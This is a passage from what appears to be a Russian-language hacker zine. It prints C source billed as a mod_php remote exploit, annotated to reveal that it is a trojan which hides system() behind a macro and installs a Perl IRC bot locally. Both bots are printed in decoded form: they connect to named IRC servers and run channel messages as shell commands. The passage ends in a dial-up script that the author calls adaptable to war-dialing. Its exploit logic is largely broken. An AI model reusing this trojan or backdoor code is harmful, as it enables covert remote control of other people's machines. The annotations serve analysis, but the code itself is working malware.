--= all the small things =--

 [+]  php mem_limit exploit live!!
  i
  i  всем приятного  пользования! Данный эксплоит достаточно  долго  гулял по
  i  EFnet'у, получали его только избранные! Если вы достаточно илитны, то он
  i  вам несомненно поможет! Даёт nobody/apache на apache <= 1.3.33 php 4.3.7
  i  (На деле шелл получает не атакующий, а тот, кто запустил бинарник:
  i  "shellcode" здесь -- не машинный код, а текст perl-бота для IRC; программа
  i  сама пишет его в /tmp/hi и запускает через system(), спрятанный за макросом
  i  PREV_IN_USE. Разбор -- в следующем разделе.)
  i
  i /*******************************************************
  i  *                                                     *
  i  *       PRIVATE !!! PRIVATE !!! PRIVATE !!!!          *
  i  *         DONT'T TRADE !!! DON'T TRADE !!!            *
  i  *      mod_php remote exploit vs Linux/FreeBSD        *
  i  *                   by  truebh                        *
  i  * http://security.e-matters.de/advisories/112004.html *
  i  *                                                     *
  i  ******************************************************/
  i
  i #include <stdio.h>
  i #include <stdlib.h>
  i #include <string.h>
  i #include <stdarg.h>
  i #include <sys/types.h>
  i #include <sys/socket.h>
  i #include <netinet/in.h>
  i #include <arpa/inet.h>
  i #include <unistd.h>
  i #include <netdb.h>
  i /* SIZE, VALID_RANGE, OFFSET, FD and BD are never referenced anywhere in
  i  * this listing -- exploit-looking decoration only. */
  i #define SIZE 0xffffff
  i /* PREV_IN_USE is not a heap-chunk flag: it is an alias for system(3).
  i  * main() invokes it exactly once, on a string taken from the tail of
  i  * `shellcode`, so it runs a shell command on the machine executing this
  i  * program, not on the target. */
  i #define PREV_IN_USE system
  i #define VALID_RANGE 0xbffffe00
  i #define OFFSET 106
  i #define FD 0x080518fc
  i #define BD 0x08082000
  i
  i
  i /* "\xeb\x0a" is a short jump over the ten 'i' filler bytes.  main() copies
  i  * it to payload+8; what follows it in the payload is ASCII Perl text, not
  i  * executable code. */
  i char jmpcode[] = "\xeb\x0aiiiiiiiiii";
  i
  i /* Despite the name, not machine code: the ASCII text of a Perl IRC bot
  i  * (decoded further down the page as dump_1.txt).  main() writes it to a
  i  * local file whose name is taken from its last bytes (shellcode+793, the
  i  * trailing "/tmp/hi") and then passes shellcode+764 (the trailing
  i  * "chmod +x /tmp/hi 2>/dev/null;/tmp/hi") to PREV_IN_USE, i.e. system(3).
  i  * Those offsets assume the 800-byte listing is transcribed intact. */
  i char shellcode[] =
  i         "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
  i         "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
  i         "\x79\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x0a\x24\x6e\x69\x63\x6b"
  i         "\x3d\x22\x70\x68\x70\x65\x22\x3b\x0a\x24\x73\x65\x72\x76\x65\x72"
  i         "\x3d\x22\x69\x72\x63\x2e\x64\x6b\x73\x2e\x63\x61\x22\x3b\x0a\x24"
  i         "\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x0a\x65\x78"
  i         "\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x0a\x75\x73\x65\x20"
  i         "\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x0a\x24\x73\x6f\x63"
  i         "\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a"
  i         "\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65"
  i         "\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74"
  i         "\x3b\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55"
  i         "\x53\x45\x52\x20\x70\x68\x70\x65\x20\x2b\x69\x20\x70\x68\x70\x65"
  i         "\x20\x3a\x70\x68\x70\x65\x5c\x6e\x4e\x49\x43\x4b\x20\x70\x68\x70"
  i         "\x65\x5c\x6e\x22\x3b\x0a\x24\x69\x3d\x31\x3b\x0a\x77\x68\x69\x6c"
  i         "\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
  i         "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x0a\x20"
  i         "\x20\x20\x20\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x0a\x20\x20\x20"
  i         "\x20\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d"
  i         "\x22\x30\x30\x31\x22\x3b\x0a\x20\x20\x20\x20\x69\x66\x28\x24\x6d"
  i         "\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x0a\x20\x20\x20"
  i         "\x20\x20\x20\x20\x20\x24\x69\x2b\x2b\x3b\x0a\x20\x20\x20\x20\x20"
  i         "\x20\x20\x20\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24"
  i         "\x2f\x24\x69\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72"
  i         "\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20"
  i         "\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a"
  i         "\x7d\x0a\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a"
  i         "\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24\x6b\x65\x79\x5c\x6e"
  i         "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
  i         "\x3e\x29\x7b\x0a\x20\x20\x20\x20\x69\x66\x20\x28\x2f\x5e\x50\x49"
  i         "\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x0a\x20\x20\x20\x20"
  i         "\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20"
  i         "\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24"
  i         "\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x0a\x20\x20\x20\x20\x7d\x0a\x20"
  i         "\x20\x20\x20\x69\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20"
  i         "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24"
  i         "\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20"
  i         "\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29"
  i         "\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x2f\x5c\x73\x2a"
  i         "\x24\x2f\x2f\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x24\x5f\x3d"
  i         "\x60\x24\x5f\x60\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x66\x6f"
  i         "\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e"
  i         "\x22\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
  i         "\x20\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52"
  i         "\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
  i         "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
  i         "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
  i         "\x20\x7d\x0a\x20\x20\x20\x20\x7d\x0a\x7d\x0a\x23\x63\x68\x6d\x6f"
  i         "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f"
  i         "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
  i
  i
  i /* Minified variant of the same Perl bot (dump_2.txt below), pointing at a
  i  * different IRC server.  Despite the name, main() selects it for targets
  i  * 5 and 6 (Debian, Gentoo), not for the two FreeBSD targets.  It is only
  i  * placed in the HTTP body; only `shellcode` is written to disk and run
  i  * locally. */
  i char fbsd_shellcode[] =
  i         "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
  i         "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
  i         "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
  i         "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
  i         "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
  i         "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
  i         "\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b"
  i         "\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b"
  i         "\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b"
  i         "\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73"
  i         "\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c"
  i         "\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
  i         "\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20"
  i         "\x6d\x6f\x72\x65\x20\x3a\x6d\x6f\x72\x65\x76\x32\x5c\x6e\x4e\x49"
  i         "\x43\x4b\x20\x70\x68\x70\x65\x78\x78\x5c\x6e\x22\x3b\x24\x69\x3d"
  i         "\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d"
  i         "\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29"
  i         "\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73"
  i         "\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31"
  i         "\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33"
  i         "\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73"
  i         "\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
  i         "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63"
  i         "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
  i         "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
  i         "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
  i         "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
  i         "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
  i         "\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
  i         "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69"
  i         "\x66\x20\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56"
  i         "\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b"
  i         "\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d"
  i         "\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x20\x7b\x73\x2f"
  i         "\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66"
  i         "\x6f\x72\x65\x61\x63\x68\x20\x28\x73\x70\x6c\x69\x74\x20\x22\x5c"
  i         "\x6e\x22\x29\x20\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
  i         "\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
  i         "\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d"
  i         "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70"
  i         "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b"
  i         "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";
  i
  i
  i
/*
 * Print the command-line help for the launcher.
 *
 * arg: argv[0], echoed in the "Usage:" line.
 *
 * Output only; nothing is validated here.  The target table is printed
 * from a fixed list in the same order as the numbers main() accepts
 * (0..6).  Note the header claims Apache 1.3.31 / PHP 4.3.7 while the
 * zine intro says apache <= 1.3.33.
 */
void usage(char *arg){
    static const char *const targets[] = {
        "FreeBSD 5",
        "FreeBSD 4.x",
        "Fedora Core 2",
        "Redhat 9",
        "SuSe 9.1",
        "Debian 3",
        "Gentoo 2004",
    };
    size_t idx;

    puts("* mod_php remote exploit vs Linux/FreeBSD *");
    printf("Usage: %s -h <host> -d <php file>\n", arg);
    puts("Options:");
    puts("\t-h ip/host of target");
    puts("\t-p port");
    puts("\t-d php file");
    puts("\t-B memory_limit 8/16/64");
    puts("\t-t target");
    puts("Targets for Apache 1.3.31 & php 4.3.7:");
    /* index doubles as the -t number */
    for (idx = 0; idx < sizeof targets / sizeof targets[0]; idx++)
        printf("\t%s: %zu\n", targets[idx], idx);
}
  i
  i
  i
  i /*
  i  * Entry point.  What this program actually does, in order:
  i  *   1. parses -h/-d/-p/-B/-t (the -t branch is broken, see below);
  i  *   2. connects once to <host>:<port>;
  i  *   3. writes `shellcode` (a Perl IRC bot, not machine code) to a LOCAL
  i  *      file named by shellcode+793 ("/tmp/hi");
  i  *   4. sends one POST whose body is 'B' filler;
  i  *   5. close()s the only socket it ever opens and never reopens it, so
  i  *      every later connect()/send() fails on a closed descriptor -- the
  i  *      "CRASH"/"ALIVE" and "YOU ARE IN"/"FAILED" messages measure nothing;
  i  *   6. calls PREV_IN_USE, i.e. system(3), on shellcode+764
  i  *      ("chmod +x /tmp/hi 2>/dev/null;/tmp/hi"), starting the bot on the
  i  *      machine running this binary.
  i  * Nothing here interacts with the PHP memory_limit bug described in the
  i  * advisory referenced in the header; the only traffic is plain POSTs.
  i  */
  i int main(int argc, char **argv){
  i     FILE *jmpinst;
  i     /* h is never initialised: without -h, inet_aton() below reads garbage. */
  i     char h[500],file[500]="index.php",buffer[1024], *payload, *ptr;
  i     int port=80,limit=8,target=0,sock;
  i     struct hostent *host;
  i     struct sockaddr_in addr;
  i
  i     if(argc < 3){
  i         usage(argv[0]);
  i         return 1;
  i     }
  i
  i     while (optind < argc){
  i         /* optstring is malformed ('d' listed twice, "t:::"). */
  i         int result = getopt(argc, argv, "p::d:B::t:::h:d:");
  i         if (result == -1) break;
  i             switch (result){
  i                 case 'h':
  i                     /* strncpy with the full size: h is left unterminated
  i                      * when optarg is 500 bytes or longer. */
  i                     strncpy(h,optarg,sizeof(h));
  i                     break;
  i                 case 'd':
  i                     strncpy(file,optarg,sizeof(file));
  i                     break;
  i                 case 'p':
  i                     if (optarg)
  i                         port = atoi(optarg);
  i                     else
  i                         port = 80;
  i                     break;
  i                 case 'B':
  i                     if (optarg)
  i                         limit = atoi(optarg);
  i                     else
  i                         limit = 8;
  i                     if(limit != 8 && limit != 16 && limit != 64)
  i                         limit = 8;
  i                     break;
  i                 case 't':
  i                     /* Tests `target` (initialised to 0 above), not optarg,
  i                      * so -t never changes anything: target stays 0. */
  i                     if (target)
  i                         target = atoi(optarg);
  i                     else
  i                         target = 0;
  i                     if(target != 0 && target != 1 && target != 2 &&
  i                             target != 3 && target != 4 && target != 5 &&
  i                             target != 6)
  i                         target = 0;
  i                      break;
  i                 default:
  i                      usage(argv[0]);
  i                      return 1;
  i             }
  i     }
  i     if (!inet_aton(h, &addr.sin_addr)){
  i         host = gethostbyname(h);
  i         if (!host){
  i             printf("Resolving failed\n");
  i             return 1;
  i         }
  i         addr.sin_addr = *(struct in_addr*)host->h_addr;
  i     }
  i     /* The only socket() call in the program; its return value is unchecked. */
  i     sock = socket(PF_INET, SOCK_STREAM, 0);
  i     addr.sin_port = htons(port);
  i     addr.sin_family = AF_INET;
  i     if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
  i         printf("Connecting failed\n");
  i         return 1;
  i     }
  i     /* "Guessing" sends nothing: it echoes the -B value back as "Ok". */
  i     printf("STEP1 - Guessing remote memory_limit\n");
  i     switch(limit){
  i         case 8:
  i             printf("+ Testing 8MO ... Ok !\n");
  i             break;
  i         case 16:
  i             printf("+ Testing 16MO ... Ok !\n");
  i             break;
  i         case 64:
  i             printf("+ Testing 64MO ... Ok !\n");
  i             break;
  i         default:
  i             printf("+ Testing 64MO ... Ok !\n");
  i     }
  i     /* Unchecked allocation; payload[0..7] stay uninitialised until STEP3. */
  i     payload = malloc(limit * 10000);
  i     ptr = payload+8;
  i     memcpy(ptr,jmpcode,strlen(jmpcode));
  i     /* THE ACTUAL PAYLOAD OF THIS PROGRAM: shellcode+793 is the trailing
  i      * "/tmp/hi"; the whole Perl bot is written to that path on the machine
  i      * running this binary.  Nothing below ever reads the file back. */
  i     jmpinst=fopen(shellcode+793,"w+");
  i     if(jmpinst){
  i         fseek(jmpinst,0,SEEK_SET);
  i         fprintf(jmpinst,"%s",shellcode);
  i         fclose(jmpinst);
  i     }
  i     ptr += strlen(jmpcode);
  i     /* Targets 5/6 (Debian, Gentoo) get fbsd_shellcode; everything else,
  i      * including the two FreeBSD targets, gets shellcode. */
  i     if(target != 5 && target != 6){
  i         memcpy(ptr,shellcode,strlen(shellcode));
  i         ptr += strlen(shellcode);
  i         /* Length ignores the strlen(jmpcode) bytes already placed after
  i          * payload+8, so this memset runs 12 bytes past the allocation. */
  i         memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
  i     }
  i     else{
  i         memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
  i         ptr += strlen(fbsd_shellcode);
  i         /* Same 12-byte heap overrun as above. */
  i         memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
  i     }
  i     printf("STEP2 - Guessing heap junk size\n");
  i     printf("+ 1000 ... ");
  i     /* ptr now points at the 'B' filler, so the body sent is 10000 'B's
  i      * (one more than the announced Content-length). */
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,10000-1);
  i     /* The only request that ever reaches the target. */
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,10000,0);
  i     close(sock);
  i     /* connect() on the descriptor just closed fails with EBADF, so this
  i      * always prints "CRASH"; the same holds for the three probes below. */
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 500 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,5000-1);
  i     /* sock is closed: these send()s fail with EBADF (return unchecked). */
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,5000,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 250 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,2500-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,2500,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     printf("+ 375 ... ");
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,3750-1);
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,ptr,3750,0);
  i     close(sock);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1)
  i         printf("CRASH\n");
  i     else
  i         printf("ALIVE\n");
  i     /* Writes a hard-coded pointer pair into payload[0..7] per target.  The
  i      * "- 12" / "+ 8" adjustments look like an unlink()-style fd/bk pair,
  i      * but since -t is a no-op only case 0 is ever taken. */
  i     printf("STEP3 - Taking control over pDestructor BAD\n");
  i     switch(target){
  i         case 0:
  i             printf("+ Targeting FreeBSD 5 Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080537ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08082000 + 8);
  i             break;
  i         case 1:
  i             printf("+ Targeting FreeBSD 4 Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080637ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08081000 + 8);
  i             break;
  i         case 2:
  i             printf("+ Targeting Fedora Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x0807e5f4 - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08081000 + 8);
  i             break;
  i         case 3:
  i             printf("+ Targeting Redhat Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x0805c1fc - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08062000 + 8);
  i             break;
  i         case 4:
  i             printf("+ Targeting SuSe Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080518fc - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08073000 + 8);
  i             break;
  i         case 5:
  i             printf("+ Targeting Debian Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080713ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08025000 + 8);
  i             break;
  i         case 6:
  i             printf("+ Targeting Gentoo Ok !\n");
  i             ptr = payload;
  i             *((void **)ptr) = (void *)(0x080937ce - 12);
  i             ptr += 4;
  i             *((void **)ptr) = (void *)(0x08072000 + 8);
  i             break;
  i     }
  i     /* payload is a char*, so sizeof(payload) is the pointer size (4 on the
  i      * 32-bit targets listed): these zero payload[3] and payload[2], i.e.
  i      * the middle of the first pointer written above, and truncate the
  i      * string that strlen()/strncat()/send() below operate on. */
  i     payload[sizeof(payload)-1] = '\0';
  i     payload[sizeof(payload)-2] = '\0';
  i     /* PREV_IN_USE is system(3); shellcode+764 is the trailing
  i      * "chmod +x /tmp/hi 2>/dev/null;/tmp/hi".  This starts the IRC bot
  i      * written to /tmp/hi above, on the operator's own machine, and uses
  i      * system()'s exit status as the strncat length. */
  i     strncat(payload,"0x1",PREV_IN_USE(shellcode+764));
  i     snprintf(buffer,sizeof(buffer),
  i             "POST /%s HTTP/1.1\r\n"
  i             "Host: %s\r\n"
  i             "Referer: www.google.com\r\n"
  i             "Content-type: application/x-www-form-urlencoded\r\n"
  i             "Content-length: %d\r\n"
  i             "Connection: close\r\n\r\n"
  i             "foobar=",file,h,strlen(payload)+8);
  i     /* Still the closed descriptor: nothing is transmitted. */
  i     send(sock,buffer,strlen(buffer),0);
  i     send(sock,payload,strlen(payload),0);
  i     close(sock);
  i     free(payload);
  i     /* connect() on the closed descriptor never returns 0, so the
  i      * operator always sees "FAILED" -- while the bot is already running. */
  i     addr.sin_port = htons(6666);
  i     if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0)
  i         printf("-- YOU ARE IN FUCKER --\n");
  i     else
  i         printf("-- FAILED - WRONG TARGET FUCKER --\n");
  i     close(sock);
  i     return 0;
  i }
  i
 [+] u wanna true?
  i
  i  Теперь собственно для тех, кто поймёт: ниже -- расшифровка обоих массивов
  i  из листинга. dump_1.txt -- это `shellcode` (его же бинарник пишет в /tmp/hi
  i  и запускает у вас локально), dump_2.txt -- `fbsd_shellcode`. Оба -- perl-боты:
  i  заходят на IRC-сервер в канал $chan и выполняют через обратные кавычки любую
  i  команду, адресованную их нику, отправляя вывод обратно в канал.
  i
  i  % cat dump_1.txt
  i  #!/usr/bin/perl
  i  # IRC bot -- the decoded contents of the C listing's `shellcode` array.
  i  # Forks into the background, connects to $server:6667, registers a nick
  i  # (retrying with a numeric suffix on 433 "nick in use"), joins $chan with
  i  # $key, then runs any channel message addressed to its nick through the
  i  # shell and posts the output back into the channel.
  i  $chan="#cn";
  i  $key ="fags";
  i  $nick="phpe";
  i  $server="irc.dks.ca";
  i  $SIG{TERM}={};
  i  exit if fork;
  i  use IO::Socket;
  i  $sock = IO::Socket::INET->new($server.":6667")||exit;
  i  print $sock "USER phpe +i phpe :phpe\nNICK phpe\n";
  i  $i=1;
  i  # Registration loop: stop on numeric 001 (welcome); on 433 pick a new nick.
  i  while(<$sock>=~/^[^ ]+ ([^ ]+) /){
  i  $mode=$1;
  i      last if $mode=="001";
  i  if($mode=="433"){
  i          $i++;
  i          $nick=~s/\d*$/$i/;
  i          print $sock "NICK $nick\n";
  i    }
  i  }
  i  print $sock "JOIN $chan $key\n";
  i  while (<$sock>){
  i  if (/^PING (.*)$/){
  i          print $sock "PONG $1\nJOIN $chan\n";
  i      }
  i      # "PRIVMSG #chan :<nick>: <text>" from anyone in the channel -> <text>
  i      if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
  i          s/\s*$//;
  i          # Remote command execution: <text> is run via the shell (backticks)
  i          # with the privileges of whoever started the bot.
  i          $_=`$_`;
  i          foreach (split "\n") {
  i              print $sock "PRIVMSG $chan :$_\n";
  i              sleep 1;
  i          }
  i      }
  i  }
  i  # Harmless as a Perl comment, but this trailing text is exactly what the
  i  # C launcher hands to system() via PREV_IN_USE(shellcode+764).
  i  #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
  i
  i  % cat dump_2.txt
  i  #!/usr/bin/perl
  i  # Minified copy of the same bot -- the decoded `fbsd_shellcode` array.
  i  # Same channel and key, different nick and IRC server; same behaviour:
  i  # messages addressed to its nick are executed via backticks and echoed back.
  i  $chan="#cn";
  i  $key ="fags";
  i  $nick="phpfr";$server="irc.ham.de.euirc.net";
  i
  i  $SIG{TERM}={};
  i  exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;
  i
  i  print $sock "USER moron +i more :morev2\nNICK phpexx\n";$i=1;
  i  while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";
  i  if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}
  i  print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/)
  i  {print $sock "PONG $1\nJOIN $chan\n";}
  i  # Command execution happens in the `$_` backticks on the next line.
  i  if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {s/\s*$//;
  i  $_=`$_`;foreach (split "\n") {print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}
  i  #chmod +x /tmp/hi 2>/dev/null;/tmp/hi
  i
  i  разделяй и властвуй )
  i
 [+] dial script linux/freebsd + winmodem
  i
  i  Изначально задумывалось как сканер для Sprint-а, но потом надоело и до
  i  сих пор используется лишь для коннекта в инет. При наличии прямых рук
  i  легко переделывается для war-dialing'a или массовых сканов x.25-сетей.
  i
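#!/bin/sh

#  Usage: ./dial_up [shutdown [<ppp-interface>]]
#
#  Generates a chat(8) script and starts pppd(8) with it.  "shutdown" sends
#  SIGINT to the pppd whose pid file is /var/run/<interface>.pid (ppp0 by
#  default) and removes the generated script.
#
#  The generated script carries LOGIN and PASSWORD in clear text.  /tmp is
#  writable by everyone, so it is created owner-only (umask 077) and with
#  noclobber set, so the redirection fails instead of writing through a file
#  or symlink somebody else left at the well-known path.

###  config  ###

TELEPHONE=P666-1313  # use P or T in begin of ph number as dial type
LOGIN='satanic'
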